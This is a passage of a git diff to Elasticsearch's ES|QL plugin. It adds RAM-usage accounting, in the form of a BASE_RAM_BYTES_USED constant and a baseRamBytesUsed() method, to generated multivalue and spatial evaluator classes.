--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import java.util.function.Function;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.IntBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MvPercentileIntegerEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileIntegerEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator values;
@@ -54,6 +57,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += values.baseRamBytesUsed();
+    baseRamBytesUsed += percentile.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock valuesBlock, DoubleBlock percentileBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java
index c5d2232f52e22..b607ee7aaf290 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import java.util.function.Function;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MvPercentileLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator values;
@@ -54,6 +57,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += values.baseRamBytesUsed();
+    baseRamBytesUsed += percentile.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock valuesBlock, DoubleBlock percentileBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
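The MvSlice evaluators that follow carry three child evaluators (field, start, end), and their generated overrides simply add one term per child. For a hand-written evaluator with a variable number of children, the same arithmetic generalizes to a loop. A sketch under that assumption, with hypothetical NaryEvaluator and Child names:

import java.util.List;
import org.apache.lucene.util.RamUsageEstimator;

// Hypothetical n-ary evaluator: same accounting as the generated three-field
// MvSlice* classes, but summed over an arbitrary child list.
final class NaryEvaluator {
  private static final long BASE_RAM_BYTES_USED =
      RamUsageEstimator.shallowSizeOfInstance(NaryEvaluator.class);

  interface Child {
    long baseRamBytesUsed();
  }

  private final List<Child> children;

  NaryEvaluator(List<Child> children) {
    this.children = children;
  }

  public long baseRamBytesUsed() {
    long bytes = BASE_RAM_BYTES_USED;
    for (Child child : children) {
      bytes += child.baseRamBytesUsed(); // one term per operand
    }
    return bytes;
  }
}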
*/ public final class MvSliceBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java index 84c97343c7b47..dd9f93f1b7cf4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvSliceBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java index f71f2ecf9fdb8..479f8d7374a23 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvSliceDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java index fa4b6ffa2130b..83b645cb385ff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.Page; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvSliceIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -55,6 +58,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java index 7aa76eb53952e..f46940e6b5181 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java index b275415b2dd77..8139e9d369e2f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -18,6 +19,8 @@ * This class is generated. 
Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumDoubleEvaluator.class); + public MvSumDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -79,6 +82,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java index f22773bfb1540..b0b5a7e364d21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumIntEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumIntEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java index ae009b97852cf..405dd877a480a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. 
*/ public final class MvSumLongEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumLongEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java index 93566b531e06c..b6e5358ecf0ce 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumUnsignedLongEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java index 557ba45f02cbe..26981d0a28c24 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.Page; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvZipEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvZipEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator leftField; @@ -55,6 +58,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += leftField.baseRamBytesUsed(); + baseRamBytesUsed += rightField.baseRamBytesUsed(); + baseRamBytesUsed += delim.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock leftFieldBlock, BytesRefBlock rightFieldBlock, BytesRefBlock delimBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java index d99e7086ee895..75ea36710b86a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java index 956df2deb42f0..daf775cf7782b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java index 6375ba99122e0..931505f8bf353 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java index 27c1c608faf6f..ba308745139e5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java index de384995136b8..7971102b2ca99 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java index 373d4829f46ed..c8506de599445 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
